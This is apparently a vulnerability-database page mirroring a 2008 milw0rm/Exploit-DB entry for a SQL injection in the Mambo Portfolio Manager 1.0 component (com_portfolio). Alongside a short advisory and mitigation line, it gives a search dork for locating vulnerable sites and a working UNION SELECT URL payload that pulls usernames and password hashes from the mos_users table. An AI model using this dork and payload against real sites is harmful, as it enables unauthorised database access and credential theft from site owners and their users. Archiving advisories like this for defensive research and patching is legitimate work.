Mambo component Portfolio Manager 1.0 (com_portfolio)

vendor:

Mambo

by:

it's my

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mambo

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:mambo_project:mambo:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mambo component Portfolio Manager 1.0 (com_portfolio)

The vulnerability is caused due to the improper sanitization of user-supplied input to the 'memberId' parameter in 'index.php' script when passing it to the 'mos_users' SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows an attacker to gain access to the database and disclose sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################



    <name>portfolio</name>
    <creationDate>2005.09.15</creationDate>
    <author>Garry Malhi</author>
    <copyright>This component  is released under the GNU/GPL License</copyright>
    <authorEmail></authorEmail>
    <authorUrl></authorUrl>

    <version>1.0</version>
    <description>Portfolio Manager Component</description>

# milw0rm.com [2008-02-18]